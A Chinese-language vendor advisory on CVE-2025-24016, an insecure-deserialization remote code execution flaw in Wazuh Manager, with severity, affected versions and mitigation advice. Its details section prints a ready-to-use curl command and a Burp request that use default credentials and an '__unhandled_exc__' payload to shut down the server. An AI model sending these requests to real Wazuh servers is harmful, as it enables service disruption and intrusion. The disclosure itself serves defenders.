CVE-2025-24016漏洞对Wazuh平台的潜在威胁

发布于 作者:

CVE-2025-24016漏洞对Wazuh平台的潜在威胁

原创 メ念灬蜘蛛 山石网科安全技术研究院 2025-03-29 09:00

图片

图片

立即行动!保护您的Wazuh服务器免受远程代码执行攻击!

图片

近日,Wazuh平台曝出一个严重安全漏洞(CVE-2025-24016),评分高达9.9,可能允许攻击者远程执行代码,控制您的服务器。这一漏洞影响Wazuh Manager4.4.0至4.9.0版本,威胁级别空前。
这篇文章将深入探讨这个漏洞的技术细节,分析其工作原理以及可能带来的安全风险。我们将一起揭开这个漏洞的神秘面纱,了解它是如何被利用的,以及我们应该如何防范

图片

一、
漏洞
背景

美国时间2025年2月10日,Wazuh发布关键补丁更新,修复了评分为9.9的严重漏洞CVE-2025-24016。

Wazuh是一个免费的开源平台,用于威胁预防、检测和响应。从4.4.0版本和4.9.1版本开始,一个不安全的反序列化漏洞允许在Wazuh服务器上远程执行代码。DistributedAPI参数序列化为JSON,并使用’as_wazuh_object’进行反序列化。如果攻击者设法在DAPI请求/响应中注入未经清理的字典,他们可以伪造未经处理的异常(’unhandled_exc‘)来评估任意python代码。该漏洞可以由任何具有API访问权限的人(受损的仪表板或集群中的Wazuh服务器)触发,或者在某些配置中,甚至由受损的代理触发。山石网科应急响应中心提醒Wazuh用户尽快采取安全措施阻止漏洞攻击。

图片

二、漏洞评级

CVE-2025-24016:严重 9.9

图片

三、影响版本

  • =Wazuh Manager 
    4.4.0

  • <=Wazuh Manager 
    4.9.0

图片

四、漏洞详情

该漏洞源于Wazuh服务器API中不安全的反序列化问题(API接口对反序列化数据缺乏安全校验)。攻击者可以通过向服务器发送特制请求来利用此缺陷,从而可能导致任意代码执行,以此关闭或控制Wazuh服务器并利用受损的代理在集群内传播攻击。“该漏洞可以由任何具有API访问权限(能够通过身份验证向服务器发送合法请求的主体)的人(受损的仪表板或集群中的Wazuh服务器)触发,或者在某些配置中,甚至由受损的代理触发,攻击者可以通过执行以下命令会强制立即关闭主服务器: 

curl -X POST -k -u "wazuh-wui:MyS3cr37P450r.*-" -H "Content-Type: application/json" --data '{"__unhandled_exc__":{"__class__": "exit", "__args__": []}}' https://<worker-server>:55000/security/user/authenticate/run_as。

攻击者向https://:55000/security/user/authenticate/run_as发送伪造身份认证的POST请求,绕过SSL证书验证(-k参数),使用默认凭证(如wazuh-wui账户)通过基础认证(-u参数),通过构造特殊的JSON数据{“unhandled_exc”:…}触发API接口的反序列化漏洞,使服务器错误解析为系统级exit命令,最终导致主服务进程强制终止。

可以通过以下方式复现漏洞

Burp Suite Request to Trigger the Vulnerability[1]: 

POST /security/user/authenticate/run_as HTTP/1.1Host: target.com:55000Cache-Control: max-age=0Accept-Language: en-USUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)   Chrome/126.0.6478.183 Safari/537.36Accept: application/jsonAccept-Encoding: gzip, deflate, brConnection: keep-aliveAuthorization: Basic d2F6dXcta3dpTUltUzNjcjM3UDA1MHItOg==  # Base64-encoded "wazuh-wui:MyS3cr37P450r.*-"Content-Type: application/jsonContent-Length: 83{  "__unhandled_exc__": {    "__class__": "exit",    "__args__": []  }}

图片

五、安全建议

1.限制 API 访问

限制对受信任网络的 API 访问并实施严格的身份验证措施。

2.禁强化代理配置:
保护 Wazuh 代理以防止通过受感染的端点进行利用。

3.监控日志:
定期查看日志中是否存在可疑活动,例如异常的 API 调用或未经
授权的访问尝试。可以通过
输入sudo tail -f /var/ossec/logs/ossec.log来对日志进行监控,如下图所示。

4.升级官方安全补丁:
在如图位置进行最新版本的安装。

图片

六、相关链接

[1]https://github.com/MuhammadWaseem29/CVE-2025-24016?tab=readme-ov-file#wazuh-remote-code-execution-rce—poc

[2]
https://www.cve.org/CVERecord?id=CVE-2025-24016

图片

山石网科是中国网络安全行业的技术创新领导厂商,由一批知名网络安全技术骨干于2007年创立,并以首批网络安全企业的身份,于2019年9月登陆科创板(股票简称:山石网科,股票代码:688030)。

现阶段,山石网科掌握30项自主研发核心技术,申请540多项国内外专利。山石网科于2019年起,积极布局信创领域,致力于推动国内信息技术创新,并于2021年正式启动安全芯片战略。2023年进行自研ASIC安全芯片的技术研发,旨在通过自主创新,为用户提供更高效、更安全的网络安全保障。目前,山石网科已形成了具备“全息、量化、智能、协同”四大技术特点的涉及边界安全、云安全、数据安全、业务安全、内网安全、智能安全运营、安全服务、安全运维等八大类产品服务,50余个行业和场景的完整解决方案。

图片